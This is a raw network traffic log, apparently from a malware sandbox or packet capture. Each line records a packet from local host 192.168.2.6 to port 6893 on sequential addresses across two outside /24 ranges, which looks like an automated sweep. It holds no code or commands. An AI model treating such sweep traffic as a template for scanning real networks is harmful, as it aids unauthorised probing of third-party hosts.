Sep 29, 2022 14:50:25.649339914 CEST	59083	6893	192.168.2.6	87.98.177.67
Sep 29, 2022 14:50:25.649393082 CEST	59083	6893	192.168.2.6	87.98.177.71
Sep 29, 2022 14:50:25.649478912 CEST	59083	6893	192.168.2.6	87.98.177.72
Sep 29, 2022 14:50:25.649591923 CEST	59083	6893	192.168.2.6	87.98.177.73
Sep 29, 2022 14:50:25.649712086 CEST	59083	6893	192.168.2.6	87.98.177.74
Sep 29, 2022 14:50:25.649812937 CEST	59083	6893	192.168.2.6	87.98.177.75
Sep 29, 2022 14:50:25.649923086 CEST	59083	6893	192.168.2.6	87.98.177.76
Sep 29, 2022 14:50:25.650041103 CEST	59083	6893	192.168.2.6	87.98.177.77
Sep 29, 2022 14:50:25.650151014 CEST	59083	6893	192.168.2.6	87.98.177.78
Sep 29, 2022 14:50:25.650285959 CEST	59083	6893	192.168.2.6	87.98.177.79
Sep 29, 2022 14:50:25.650434017 CEST	59083	6893	192.168.2.6	87.98.177.80
Sep 29, 2022 14:50:25.650542021 CEST	59083	6893	192.168.2.6	87.98.177.81
Sep 29, 2022 14:50:25.650680065 CEST	59083	6893	192.168.2.6	87.98.177.82
Sep 29, 2022 14:50:25.650759935 CEST	59083	6893	192.168.2.6	87.98.177.83
Sep 29, 2022 14:50:25.650871038 CEST	59083	6893	192.168.2.6	87.98.177.84
Sep 29, 2022 14:50:25.650986910 CEST	59083	6893	192.168.2.6	87.98.177.85
Sep 29, 2022 14:50:25.651115894 CEST	59083	6893	192.168.2.6	87.98.177.86
Sep 29, 2022 14:50:25.651338100 CEST	59083	6893	192.168.2.6	87.98.177.87
Sep 29, 2022 14:50:25.651575089 CEST	59083	6893	192.168.2.6	87.98.177.88
Sep 29, 2022 14:50:25.651808023 CEST	59083	6893	192.168.2.6	87.98.177.89
Sep 29, 2022 14:50:25.651936054 CEST	59083	6893	192.168.2.6	87.98.177.90
Sep 29, 2022 14:50:25.652093887 CEST	59083	6893	192.168.2.6	87.98.177.91
Sep 29, 2022 14:50:25.652265072 CEST	59083	6893	192.168.2.6	87.98.177.92
Sep 29, 2022 14:50:25.652458906 CEST	59083	6893	192.168.2.6	87.98.177.93
Sep 29, 2022 14:50:25.652641058 CEST	59083	6893	192.168.2.6	87.98.177.94
Sep 29, 2022 14:50:25.652941942 CEST	59083	6893	192.168.2.6	87.98.177.95
Sep 29, 2022 14:50:25.653048038 CEST	59083	6893	192.168.2.6	87.98.177.96
Sep 29, 2022 14:50:25.653228998 CEST	59083	6893	192.168.2.6	87.98.177.97
Sep 29, 2022 14:50:25.653352022 CEST	59083	6893	192.168.2.6	87.98.177.98
Sep 29, 2022 14:50:25.653484106 CEST	59083	6893	192.168.2.6	87.98.177.99
Sep 29, 2022 14:50:25.653578043 CEST	59083	6893	192.168.2.6	87.98.177.100
Sep 29, 2022 14:50:25.653733969 CEST	59083	6893	192.168.2.6	87.98.177.101
Sep 29, 2022 14:50:25.653861046 CEST	59083	6893	192.168.2.6	87.98.177.102
Sep 29, 2022 14:50:25.653973103 CEST	59083	6893	192.168.2.6	87.98.177.103
Sep 29, 2022 14:50:25.654082060 CEST	59083	6893	192.168.2.6	87.98.177.104
Sep 29, 2022 14:50:25.654196978 CEST	59083	6893	192.168.2.6	87.98.177.105
Sep 29, 2022 14:50:25.654295921 CEST	59083	6893	192.168.2.6	87.98.177.106
Sep 29, 2022 14:50:25.654449940 CEST	59083	6893	192.168.2.6	87.98.177.107
Sep 29, 2022 14:50:25.654567003 CEST	59083	6893	192.168.2.6	87.98.177.108
Sep 29, 2022 14:50:25.654709101 CEST	59083	6893	192.168.2.6	87.98.177.109
Sep 29, 2022 14:50:25.654999018 CEST	59083	6893	192.168.2.6	87.98.177.110
Sep 29, 2022 14:50:25.655029058 CEST	59083	6893	192.168.2.6	87.98.177.111
Sep 29, 2022 14:50:25.655155897 CEST	59083	6893	192.168.2.6	87.98.177.112
Sep 29, 2022 14:50:25.655236959 CEST	59083	6893	192.168.2.6	87.98.177.113
Sep 29, 2022 14:50:25.655399084 CEST	59083	6893	192.168.2.6	87.98.177.114
Sep 29, 2022 14:50:25.655430079 CEST	59083	6893	192.168.2.6	87.98.177.115
Sep 29, 2022 14:50:25.655469894 CEST	59083	6893	192.168.2.6	87.98.177.116
Sep 29, 2022 14:50:25.655570984 CEST	59083	6893	192.168.2.6	87.98.177.117
Sep 29, 2022 14:50:25.655668020 CEST	59083	6893	192.168.2.6	87.98.177.118
Sep 29, 2022 14:50:25.655749083 CEST	59083	6893	192.168.2.6	87.98.177.119
Sep 29, 2022 14:50:25.655831099 CEST	59083	6893	192.168.2.6	87.98.177.120
Sep 29, 2022 14:50:25.655899048 CEST	59083	6893	192.168.2.6	87.98.177.121
Sep 29, 2022 14:50:25.655988932 CEST	59083	6893	192.168.2.6	87.98.177.122
Sep 29, 2022 14:50:25.656078100 CEST	59083	6893	192.168.2.6	87.98.177.123
Sep 29, 2022 14:50:25.656198025 CEST	59083	6893	192.168.2.6	87.98.177.124
Sep 29, 2022 14:50:25.656275988 CEST	59083	6893	192.168.2.6	87.98.177.125
Sep 29, 2022 14:50:25.656359911 CEST	59083	6893	192.168.2.6	87.98.177.126
Sep 29, 2022 14:50:25.656563997 CEST	59083	6893	192.168.2.6	87.98.177.127
Sep 29, 2022 14:50:25.656691074 CEST	59083	6893	192.168.2.6	87.98.177.128
Sep 29, 2022 14:50:25.656924963 CEST	59083	6893	192.168.2.6	87.98.177.129
Sep 29, 2022 14:50:25.657120943 CEST	59083	6893	192.168.2.6	87.98.177.130
Sep 29, 2022 14:50:25.657242060 CEST	59083	6893	192.168.2.6	87.98.177.131
Sep 29, 2022 14:50:25.657365084 CEST	59083	6893	192.168.2.6	87.98.177.132
Sep 29, 2022 14:50:25.657510996 CEST	59083	6893	192.168.2.6	87.98.177.133
Sep 29, 2022 14:50:25.657705069 CEST	59083	6893	192.168.2.6	87.98.177.134
Sep 29, 2022 14:50:25.657756090 CEST	59083	6893	192.168.2.6	87.98.177.135
Sep 29, 2022 14:50:25.657859087 CEST	59083	6893	192.168.2.6	87.98.177.136
Sep 29, 2022 14:50:25.659084082 CEST	59083	6893	192.168.2.6	87.98.177.137
Sep 29, 2022 14:50:25.659224033 CEST	59083	6893	192.168.2.6	87.98.177.138
Sep 29, 2022 14:50:25.659364939 CEST	59083	6893	192.168.2.6	87.98.177.139
Sep 29, 2022 14:50:25.659512997 CEST	59083	6893	192.168.2.6	87.98.177.140
Sep 29, 2022 14:50:25.659642935 CEST	59083	6893	192.168.2.6	87.98.177.141
Sep 29, 2022 14:50:25.660661936 CEST	59083	6893	192.168.2.6	87.98.177.142
Sep 29, 2022 14:50:25.661082029 CEST	59083	6893	192.168.2.6	87.98.177.143
Sep 29, 2022 14:50:25.661281109 CEST	59083	6893	192.168.2.6	87.98.177.144
Sep 29, 2022 14:50:25.661442995 CEST	59083	6893	192.168.2.6	87.98.177.145
Sep 29, 2022 14:50:25.661629915 CEST	59083	6893	192.168.2.6	87.98.177.146
Sep 29, 2022 14:50:25.661727905 CEST	59083	6893	192.168.2.6	87.98.177.147
Sep 29, 2022 14:50:25.661864042 CEST	59083	6893	192.168.2.6	87.98.177.148
Sep 29, 2022 14:50:25.661957026 CEST	59083	6893	192.168.2.6	87.98.177.149
Sep 29, 2022 14:50:25.662209988 CEST	59083	6893	192.168.2.6	87.98.177.150
Sep 29, 2022 14:50:25.663322926 CEST	59083	6893	192.168.2.6	87.98.177.151
Sep 29, 2022 14:50:25.663501024 CEST	59083	6893	192.168.2.6	87.98.177.152
Sep 29, 2022 14:50:25.663645029 CEST	59083	6893	192.168.2.6	87.98.177.153
Sep 29, 2022 14:50:25.663779974 CEST	59083	6893	192.168.2.6	87.98.177.154
Sep 29, 2022 14:50:25.663923979 CEST	59083	6893	192.168.2.6	87.98.177.155
Sep 29, 2022 14:50:25.664089918 CEST	59083	6893	192.168.2.6	87.98.177.156
Sep 29, 2022 14:50:25.664235115 CEST	59083	6893	192.168.2.6	87.98.177.157
Sep 29, 2022 14:50:25.664376974 CEST	59083	6893	192.168.2.6	87.98.177.158
Sep 29, 2022 14:50:25.664659977 CEST	59083	6893	192.168.2.6	87.98.177.160
Sep 29, 2022 14:50:25.664750099 CEST	59083	6893	192.168.2.6	87.98.177.159
Sep 29, 2022 14:50:25.664812088 CEST	59083	6893	192.168.2.6	87.98.177.161
Sep 29, 2022 14:50:25.665170908 CEST	59083	6893	192.168.2.6	87.98.177.162
Sep 29, 2022 14:50:25.665319920 CEST	59083	6893	192.168.2.6	87.98.177.163
Sep 29, 2022 14:50:25.665507078 CEST	59083	6893	192.168.2.6	87.98.177.164
Sep 29, 2022 14:50:25.665628910 CEST	59083	6893	192.168.2.6	87.98.177.165
Sep 29, 2022 14:50:25.665747881 CEST	59083	6893	192.168.2.6	87.98.177.166
Sep 29, 2022 14:50:25.665987968 CEST	59083	6893	192.168.2.6	87.98.177.167
Sep 29, 2022 14:50:25.666941881 CEST	59083	6893	192.168.2.6	87.98.177.168
Sep 29, 2022 14:50:25.667124987 CEST	59083	6893	192.168.2.6	87.98.177.169
Sep 29, 2022 14:50:25.667274952 CEST	59083	6893	192.168.2.6	87.98.177.170
Sep 29, 2022 14:50:25.667417049 CEST	59083	6893	192.168.2.6	87.98.177.171
Sep 29, 2022 14:50:25.667562008 CEST	59083	6893	192.168.2.6	87.98.177.172
Sep 29, 2022 14:50:25.667668104 CEST	59083	6893	192.168.2.6	87.98.177.173
Sep 29, 2022 14:50:25.667850971 CEST	59083	6893	192.168.2.6	87.98.177.174
Sep 29, 2022 14:50:25.667905092 CEST	59083	6893	192.168.2.6	87.98.177.175
Sep 29, 2022 14:50:25.668612003 CEST	59083	6893	192.168.2.6	87.98.177.176
Sep 29, 2022 14:50:25.668889046 CEST	59083	6893	192.168.2.6	87.98.177.177
Sep 29, 2022 14:50:25.669015884 CEST	59083	6893	192.168.2.6	87.98.177.178
Sep 29, 2022 14:50:25.669136047 CEST	59083	6893	192.168.2.6	87.98.177.179
Sep 29, 2022 14:50:25.669256926 CEST	59083	6893	192.168.2.6	87.98.177.180
Sep 29, 2022 14:50:25.669392109 CEST	59083	6893	192.168.2.6	87.98.177.181
Sep 29, 2022 14:50:25.669553041 CEST	59083	6893	192.168.2.6	87.98.177.182
Sep 29, 2022 14:50:25.669644117 CEST	59083	6893	192.168.2.6	87.98.177.183
Sep 29, 2022 14:50:25.669847965 CEST	59083	6893	192.168.2.6	87.98.177.184
Sep 29, 2022 14:50:25.670030117 CEST	59083	6893	192.168.2.6	87.98.177.185
Sep 29, 2022 14:50:25.670267105 CEST	59083	6893	192.168.2.6	87.98.177.186
Sep 29, 2022 14:50:25.670406103 CEST	59083	6893	192.168.2.6	87.98.177.187
Sep 29, 2022 14:50:25.670531988 CEST	59083	6893	192.168.2.6	87.98.177.188
Sep 29, 2022 14:50:25.670666933 CEST	59083	6893	192.168.2.6	87.98.177.189
Sep 29, 2022 14:50:25.670798063 CEST	59083	6893	192.168.2.6	87.98.177.190
Sep 29, 2022 14:50:25.672244072 CEST	59083	6893	192.168.2.6	87.98.177.191
Sep 29, 2022 14:50:25.672450066 CEST	59083	6893	192.168.2.6	87.98.177.192
Sep 29, 2022 14:50:25.672729969 CEST	59083	6893	192.168.2.6	87.98.177.194
Sep 29, 2022 14:50:25.672744036 CEST	59083	6893	192.168.2.6	87.98.177.193
Sep 29, 2022 14:50:25.672847986 CEST	59083	6893	192.168.2.6	87.98.177.195
Sep 29, 2022 14:50:25.672977924 CEST	59083	6893	192.168.2.6	87.98.177.196
Sep 29, 2022 14:50:25.673075914 CEST	59083	6893	192.168.2.6	87.98.177.197
Sep 29, 2022 14:50:25.685178041 CEST	59083	6893	192.168.2.6	87.98.177.198
Sep 29, 2022 14:50:25.685518980 CEST	59083	6893	192.168.2.6	87.98.177.199
Sep 29, 2022 14:50:25.685672045 CEST	59083	6893	192.168.2.6	87.98.177.200
Sep 29, 2022 14:50:25.685853958 CEST	59083	6893	192.168.2.6	87.98.177.201
Sep 29, 2022 14:50:25.686054945 CEST	59083	6893	192.168.2.6	87.98.177.202
Sep 29, 2022 14:50:25.686224937 CEST	59083	6893	192.168.2.6	87.98.177.203
Sep 29, 2022 14:50:25.686398029 CEST	59083	6893	192.168.2.6	87.98.177.204
Sep 29, 2022 14:50:25.686574936 CEST	59083	6893	192.168.2.6	87.98.177.205
Sep 29, 2022 14:50:25.686909914 CEST	59083	6893	192.168.2.6	87.98.177.206
Sep 29, 2022 14:50:25.686922073 CEST	59083	6893	192.168.2.6	87.98.177.207
Sep 29, 2022 14:50:25.687093973 CEST	59083	6893	192.168.2.6	87.98.177.208
Sep 29, 2022 14:50:25.687563896 CEST	59083	6893	192.168.2.6	87.98.177.209
Sep 29, 2022 14:50:25.687870026 CEST	59083	6893	192.168.2.6	87.98.177.210
Sep 29, 2022 14:50:25.688050032 CEST	59083	6893	192.168.2.6	87.98.177.211
Sep 29, 2022 14:50:25.688286066 CEST	59083	6893	192.168.2.6	87.98.177.212
Sep 29, 2022 14:50:25.688607931 CEST	59083	6893	192.168.2.6	87.98.177.213
Sep 29, 2022 14:50:25.688715935 CEST	59083	6893	192.168.2.6	87.98.177.214
Sep 29, 2022 14:50:25.688890934 CEST	59083	6893	192.168.2.6	87.98.177.215
Sep 29, 2022 14:50:25.689054966 CEST	59083	6893	192.168.2.6	87.98.177.216
Sep 29, 2022 14:50:25.689243078 CEST	59083	6893	192.168.2.6	87.98.177.217
Sep 29, 2022 14:50:25.689393997 CEST	59083	6893	192.168.2.6	87.98.177.218
Sep 29, 2022 14:50:25.689553022 CEST	59083	6893	192.168.2.6	87.98.177.219
Sep 29, 2022 14:50:25.689712048 CEST	59083	6893	192.168.2.6	87.98.177.220
Sep 29, 2022 14:50:25.689882994 CEST	59083	6893	192.168.2.6	87.98.177.221
Sep 29, 2022 14:50:25.690112114 CEST	59083	6893	192.168.2.6	87.98.177.222
Sep 29, 2022 14:50:25.690284014 CEST	59083	6893	192.168.2.6	87.98.177.223
Sep 29, 2022 14:50:25.690459013 CEST	59083	6893	192.168.2.6	87.98.177.224
Sep 29, 2022 14:50:25.690929890 CEST	59083	6893	192.168.2.6	87.98.177.225
Sep 29, 2022 14:50:25.690970898 CEST	59083	6893	192.168.2.6	87.98.177.226
Sep 29, 2022 14:50:25.698242903 CEST	59083	6893	192.168.2.6	87.98.177.227
Sep 29, 2022 14:50:25.698604107 CEST	59083	6893	192.168.2.6	87.98.177.228
Sep 29, 2022 14:50:25.698869944 CEST	59083	6893	192.168.2.6	87.98.177.229
Sep 29, 2022 14:50:25.699048996 CEST	59083	6893	192.168.2.6	87.98.177.230
Sep 29, 2022 14:50:25.699234962 CEST	59083	6893	192.168.2.6	87.98.177.231
Sep 29, 2022 14:50:25.699434996 CEST	59083	6893	192.168.2.6	87.98.177.232
Sep 29, 2022 14:50:25.699630022 CEST	59083	6893	192.168.2.6	87.98.177.233
Sep 29, 2022 14:50:25.699913979 CEST	59083	6893	192.168.2.6	87.98.177.234
Sep 29, 2022 14:50:25.700090885 CEST	59083	6893	192.168.2.6	87.98.177.235
Sep 29, 2022 14:50:25.700371027 CEST	59083	6893	192.168.2.6	87.98.177.236
Sep 29, 2022 14:50:25.700568914 CEST	59083	6893	192.168.2.6	87.98.177.237
Sep 29, 2022 14:50:25.700753927 CEST	59083	6893	192.168.2.6	87.98.177.238
Sep 29, 2022 14:50:25.701165915 CEST	59083	6893	192.168.2.6	87.98.177.239
Sep 29, 2022 14:50:25.701746941 CEST	59083	6893	192.168.2.6	87.98.177.241
Sep 29, 2022 14:50:25.701905966 CEST	59083	6893	192.168.2.6	87.98.177.240
Sep 29, 2022 14:50:25.701931000 CEST	59083	6893	192.168.2.6	87.98.177.242
Sep 29, 2022 14:50:25.702192068 CEST	59083	6893	192.168.2.6	87.98.177.243
Sep 29, 2022 14:50:25.702347040 CEST	59083	6893	192.168.2.6	87.98.177.244
Sep 29, 2022 14:50:25.702513933 CEST	59083	6893	192.168.2.6	87.98.177.245
Sep 29, 2022 14:50:25.702682018 CEST	59083	6893	192.168.2.6	87.98.177.246
Sep 29, 2022 14:50:25.702868938 CEST	59083	6893	192.168.2.6	87.98.177.247
Sep 29, 2022 14:50:25.703044891 CEST	59083	6893	192.168.2.6	87.98.177.248
Sep 29, 2022 14:50:25.703296900 CEST	59083	6893	192.168.2.6	87.98.177.249
Sep 29, 2022 14:50:25.703448057 CEST	59083	6893	192.168.2.6	87.98.177.250
Sep 29, 2022 14:50:25.703602076 CEST	59083	6893	192.168.2.6	87.98.177.251
Sep 29, 2022 14:50:25.703766108 CEST	59083	6893	192.168.2.6	87.98.177.252
Sep 29, 2022 14:50:25.703990936 CEST	59083	6893	192.168.2.6	87.98.177.253
Sep 29, 2022 14:50:25.704169989 CEST	59083	6893	192.168.2.6	87.98.177.254
Sep 29, 2022 14:50:26.719393969 CEST	59083	6893	192.168.2.6	87.98.177.255
Sep 29, 2022 14:50:26.719829082 CEST	59083	6893	192.168.2.6	87.98.178.0
Sep 29, 2022 14:50:26.719928026 CEST	59083	6893	192.168.2.6	87.98.178.1
Sep 29, 2022 14:50:26.720298052 CEST	59083	6893	192.168.2.6	87.98.178.2
Sep 29, 2022 14:50:26.720479965 CEST	59083	6893	192.168.2.6	87.98.178.3
Sep 29, 2022 14:50:26.721879959 CEST	59083	6893	192.168.2.6	87.98.178.4
Sep 29, 2022 14:50:26.721960068 CEST	59083	6893	192.168.2.6	87.98.178.5
Sep 29, 2022 14:50:26.722033978 CEST	59083	6893	192.168.2.6	87.98.178.6
Sep 29, 2022 14:50:26.722250938 CEST	59083	6893	192.168.2.6	87.98.178.7
Sep 29, 2022 14:50:26.722251892 CEST	59083	6893	192.168.2.6	87.98.178.8
Sep 29, 2022 14:50:26.722325087 CEST	59083	6893	192.168.2.6	87.98.178.9
Sep 29, 2022 14:50:26.725833893 CEST	59083	6893	192.168.2.6	87.98.178.10
Sep 29, 2022 14:50:26.726979971 CEST	59083	6893	192.168.2.6	87.98.178.11
Sep 29, 2022 14:50:26.727149963 CEST	59083	6893	192.168.2.6	87.98.178.12
Sep 29, 2022 14:50:26.727349043 CEST	59083	6893	192.168.2.6	87.98.178.13
Sep 29, 2022 14:50:26.727421999 CEST	59083	6893	192.168.2.6	87.98.178.14
Sep 29, 2022 14:50:26.727516890 CEST	59083	6893	192.168.2.6	87.98.178.15
Sep 29, 2022 14:50:26.727591991 CEST	59083	6893	192.168.2.6	87.98.178.16
Sep 29, 2022 14:50:26.727669954 CEST	59083	6893	192.168.2.6	87.98.178.17
Sep 29, 2022 14:50:26.734417915 CEST	59083	6893	192.168.2.6	87.98.178.18
Sep 29, 2022 14:50:26.734596014 CEST	59083	6893	192.168.2.6	87.98.178.19
Sep 29, 2022 14:50:26.734690905 CEST	59083	6893	192.168.2.6	87.98.178.20
Sep 29, 2022 14:50:26.734777927 CEST	59083	6893	192.168.2.6	87.98.178.21
Sep 29, 2022 14:50:26.735050917 CEST	59083	6893	192.168.2.6	87.98.178.22
Sep 29, 2022 14:50:26.735085964 CEST	59083	6893	192.168.2.6	87.98.178.23
Sep 29, 2022 14:50:26.735085964 CEST	59083	6893	192.168.2.6	87.98.178.24
Sep 29, 2022 14:50:26.735183001 CEST	59083	6893	192.168.2.6	87.98.178.25
Sep 29, 2022 14:50:26.735261917 CEST	59083	6893	192.168.2.6	87.98.178.26
Sep 29, 2022 14:50:26.735347033 CEST	59083	6893	192.168.2.6	87.98.178.27
Sep 29, 2022 14:50:26.735435009 CEST	59083	6893	192.168.2.6	87.98.178.28
Sep 29, 2022 14:50:26.735565901 CEST	59083	6893	192.168.2.6	87.98.178.29
Sep 29, 2022 14:50:26.735619068 CEST	59083	6893	192.168.2.6	87.98.178.30
Sep 29, 2022 14:50:26.736677885 CEST	59083	6893	192.168.2.6	87.98.178.31
Sep 29, 2022 14:50:26.791237116 CEST	59083	6893	192.168.2.6	87.98.178.32
Sep 29, 2022 14:50:26.791399002 CEST	59083	6893	192.168.2.6	87.98.178.33
Sep 29, 2022 14:50:26.791603088 CEST	59083	6893	192.168.2.6	87.98.178.34
Sep 29, 2022 14:50:26.791752100 CEST	59083	6893	192.168.2.6	87.98.178.35
Sep 29, 2022 14:50:26.791846037 CEST	59083	6893	192.168.2.6	87.98.178.36
Sep 29, 2022 14:50:26.791951895 CEST	59083	6893	192.168.2.6	87.98.178.37
Sep 29, 2022 14:50:26.792165995 CEST	59083	6893	192.168.2.6	87.98.178.39
Sep 29, 2022 14:50:26.792238951 CEST	59083	6893	192.168.2.6	87.98.178.40
Sep 29, 2022 14:50:26.792272091 CEST	59083	6893	192.168.2.6	87.98.178.38
Sep 29, 2022 14:50:26.792393923 CEST	59083	6893	192.168.2.6	87.98.178.41
Sep 29, 2022 14:50:26.792419910 CEST	59083	6893	192.168.2.6	87.98.178.42
Sep 29, 2022 14:50:26.792525053 CEST	59083	6893	192.168.2.6	87.98.178.43
Sep 29, 2022 14:50:26.792613029 CEST	59083	6893	192.168.2.6	87.98.178.44
Sep 29, 2022 14:50:26.792712927 CEST	59083	6893	192.168.2.6	87.98.178.45
Sep 29, 2022 14:50:26.792805910 CEST	59083	6893	192.168.2.6	87.98.178.46
Sep 29, 2022 14:50:26.792886019 CEST	59083	6893	192.168.2.6	87.98.178.47
Sep 29, 2022 14:50:26.792959929 CEST	59083	6893	192.168.2.6	87.98.178.48
Sep 29, 2022 14:50:26.793112040 CEST	59083	6893	192.168.2.6	87.98.178.49
Sep 29, 2022 14:50:26.793231010 CEST	59083	6893	192.168.2.6	87.98.178.50
Sep 29, 2022 14:50:26.793318987 CEST	59083	6893	192.168.2.6	87.98.178.51
Sep 29, 2022 14:50:26.793426991 CEST	59083	6893	192.168.2.6	87.98.178.52
Sep 29, 2022 14:50:26.793549061 CEST	59083	6893	192.168.2.6	87.98.178.53
Sep 29, 2022 14:50:26.793642044 CEST	59083	6893	192.168.2.6	87.98.178.54
Sep 29, 2022 14:50:26.793798923 CEST	59083	6893	192.168.2.6	87.98.178.55
Sep 29, 2022 14:50:26.793869019 CEST	59083	6893	192.168.2.6	87.98.178.56
Sep 29, 2022 14:50:26.794048071 CEST	59083	6893	192.168.2.6	87.98.178.57
Sep 29, 2022 14:50:26.794126987 CEST	59083	6893	192.168.2.6	87.98.178.58
Sep 29, 2022 14:50:26.794234991 CEST	59083	6893	192.168.2.6	87.98.178.59
Sep 29, 2022 14:50:26.795865059 CEST	59083	6893	192.168.2.6	87.98.178.60
Sep 29, 2022 14:50:26.796170950 CEST	59083	6893	192.168.2.6	87.98.178.61
Sep 29, 2022 14:50:26.796240091 CEST	59083	6893	192.168.2.6	87.98.178.62
Sep 29, 2022 14:50:26.796318054 CEST	59083	6893	192.168.2.6	87.98.178.63
Sep 29, 2022 14:50:26.796423912 CEST	59083	6893	192.168.2.6	87.98.178.64
Sep 29, 2022 14:50:26.796546936 CEST	59083	6893	192.168.2.6	87.98.178.65
Sep 29, 2022 14:50:26.796721935 CEST	59083	6893	192.168.2.6	87.98.178.66
Sep 29, 2022 14:50:26.797451973 CEST	59083	6893	192.168.2.6	87.98.178.67
Sep 29, 2022 14:50:26.797564030 CEST	59083	6893	192.168.2.6	87.98.178.68
Sep 29, 2022 14:50:26.797665119 CEST	59083	6893	192.168.2.6	87.98.178.69
Sep 29, 2022 14:50:26.797920942 CEST	59083	6893	192.168.2.6	87.98.178.71
Sep 29, 2022 14:50:26.797976017 CEST	59083	6893	192.168.2.6	87.98.178.70
Sep 29, 2022 14:50:26.797995090 CEST	59083	6893	192.168.2.6	87.98.178.72
Sep 29, 2022 14:50:26.798213959 CEST	59083	6893	192.168.2.6	87.98.178.74
Sep 29, 2022 14:50:26.798258066 CEST	59083	6893	192.168.2.6	87.98.178.73
Sep 29, 2022 14:50:26.798305035 CEST	59083	6893	192.168.2.6	87.98.178.75
Sep 29, 2022 14:50:26.798541069 CEST	59083	6893	192.168.2.6	87.98.178.77
Sep 29, 2022 14:50:26.798626900 CEST	59083	6893	192.168.2.6	87.98.178.78
Sep 29, 2022 14:50:26.798728943 CEST	59083	6893	192.168.2.6	87.98.178.79
Sep 29, 2022 14:50:26.798805952 CEST	59083	6893	192.168.2.6	87.98.178.80
Sep 29, 2022 14:50:26.798912048 CEST	59083	6893	192.168.2.6	87.98.178.81
Sep 29, 2022 14:50:26.799015045 CEST	59083	6893	192.168.2.6	87.98.178.76
Sep 29, 2022 14:50:26.799015045 CEST	59083	6893	192.168.2.6	87.98.178.82
Sep 29, 2022 14:50:26.799141884 CEST	59083	6893	192.168.2.6	87.98.178.83
Sep 29, 2022 14:50:26.799269915 CEST	59083	6893	192.168.2.6	87.98.178.84
Sep 29, 2022 14:50:26.799376965 CEST	59083	6893	192.168.2.6	87.98.178.85
Sep 29, 2022 14:50:26.799491882 CEST	59083	6893	192.168.2.6	87.98.178.86
Sep 29, 2022 14:50:26.799704075 CEST	59083	6893	192.168.2.6	87.98.178.87
Sep 29, 2022 14:50:26.799704075 CEST	59083	6893	192.168.2.6	87.98.178.88
Sep 29, 2022 14:50:26.799839020 CEST	59083	6893	192.168.2.6	87.98.178.89
Sep 29, 2022 14:50:26.799972057 CEST	59083	6893	192.168.2.6	87.98.178.90
Sep 29, 2022 14:50:26.800070047 CEST	59083	6893	192.168.2.6	87.98.178.91
Sep 29, 2022 14:50:26.801925898 CEST	59083	6893	192.168.2.6	87.98.178.92
Sep 29, 2022 14:50:26.802083969 CEST	59083	6893	192.168.2.6	87.98.178.93
Sep 29, 2022 14:50:26.802162886 CEST	59083	6893	192.168.2.6	87.98.178.94
Sep 29, 2022 14:50:26.802999973 CEST	59083	6893	192.168.2.6	87.98.178.95
Sep 29, 2022 14:50:26.803325891 CEST	59083	6893	192.168.2.6	87.98.178.96
Sep 29, 2022 14:50:26.803344011 CEST	59083	6893	192.168.2.6	87.98.178.97
Sep 29, 2022 14:50:26.803447962 CEST	59083	6893	192.168.2.6	87.98.178.98
Sep 29, 2022 14:50:26.803658009 CEST	59083	6893	192.168.2.6	87.98.178.99
Sep 29, 2022 14:50:26.803769112 CEST	59083	6893	192.168.2.6	87.98.178.100
Sep 29, 2022 14:50:26.803873062 CEST	59083	6893	192.168.2.6	87.98.178.101
Sep 29, 2022 14:50:26.804037094 CEST	59083	6893	192.168.2.6	87.98.178.102
Sep 29, 2022 14:50:26.804095984 CEST	59083	6893	192.168.2.6	87.98.178.103
Sep 29, 2022 14:50:26.804181099 CEST	59083	6893	192.168.2.6	87.98.178.104
Sep 29, 2022 14:50:26.804290056 CEST	59083	6893	192.168.2.6	87.98.178.105
Sep 29, 2022 14:50:26.804369926 CEST	59083	6893	192.168.2.6	87.98.178.106
Sep 29, 2022 14:50:26.804533005 CEST	59083	6893	192.168.2.6	87.98.178.107
Sep 29, 2022 14:50:26.804622889 CEST	59083	6893	192.168.2.6	87.98.178.108
Sep 29, 2022 14:50:26.804713011 CEST	59083	6893	192.168.2.6	87.98.178.109
Sep 29, 2022 14:50:26.804800987 CEST	59083	6893	192.168.2.6	87.98.178.110
Sep 29, 2022 14:50:26.804886103 CEST	59083	6893	192.168.2.6	87.98.178.111
Sep 29, 2022 14:50:26.804965973 CEST	59083	6893	192.168.2.6	87.98.178.112
Sep 29, 2022 14:50:26.805097103 CEST	59083	6893	192.168.2.6	87.98.178.113
Sep 29, 2022 14:50:26.805238008 CEST	59083	6893	192.168.2.6	87.98.178.114
Sep 29, 2022 14:50:26.805386066 CEST	59083	6893	192.168.2.6	87.98.178.115
Sep 29, 2022 14:50:26.805519104 CEST	59083	6893	192.168.2.6	87.98.178.116
Sep 29, 2022 14:50:26.805615902 CEST	59083	6893	192.168.2.6	87.98.178.117
Sep 29, 2022 14:50:26.805830002 CEST	59083	6893	192.168.2.6	87.98.178.118
Sep 29, 2022 14:50:26.806116104 CEST	59083	6893	192.168.2.6	87.98.178.119
Sep 29, 2022 14:50:26.806305885 CEST	59083	6893	192.168.2.6	87.98.178.120
Sep 29, 2022 14:50:26.806457043 CEST	59083	6893	192.168.2.6	87.98.178.121
Sep 29, 2022 14:50:26.807123899 CEST	59083	6893	192.168.2.6	87.98.178.122
Sep 29, 2022 14:50:26.807279110 CEST	59083	6893	192.168.2.6	87.98.178.123
Sep 29, 2022 14:50:26.807518959 CEST	59083	6893	192.168.2.6	87.98.178.124
Sep 29, 2022 14:50:26.807605982 CEST	59083	6893	192.168.2.6	87.98.178.125
Sep 29, 2022 14:50:26.807734966 CEST	59083	6893	192.168.2.6	87.98.178.126
Sep 29, 2022 14:50:26.807867050 CEST	59083	6893	192.168.2.6	87.98.178.127
Sep 29, 2022 14:50:26.807960987 CEST	59083	6893	192.168.2.6	87.98.178.128
Sep 29, 2022 14:50:26.808077097 CEST	59083	6893	192.168.2.6	87.98.178.129
Sep 29, 2022 14:50:26.808199883 CEST	59083	6893	192.168.2.6	87.98.178.130
Sep 29, 2022 14:50:26.808290005 CEST	59083	6893	192.168.2.6	87.98.178.131
Sep 29, 2022 14:50:26.808494091 CEST	59083	6893	192.168.2.6	87.98.178.132
Sep 29, 2022 14:50:26.808535099 CEST	59083	6893	192.168.2.6	87.98.178.133
Sep 29, 2022 14:50:26.808634996 CEST	59083	6893	192.168.2.6	87.98.178.134
Sep 29, 2022 14:50:26.808722019 CEST	59083	6893	192.168.2.6	87.98.178.135
Sep 29, 2022 14:50:26.808829069 CEST	59083	6893	192.168.2.6	87.98.178.136
Sep 29, 2022 14:50:26.808955908 CEST	59083	6893	192.168.2.6	87.98.178.137
Sep 29, 2022 14:50:26.809081078 CEST	59083	6893	192.168.2.6	87.98.178.138
Sep 29, 2022 14:50:26.809174061 CEST	59083	6893	192.168.2.6	87.98.178.139
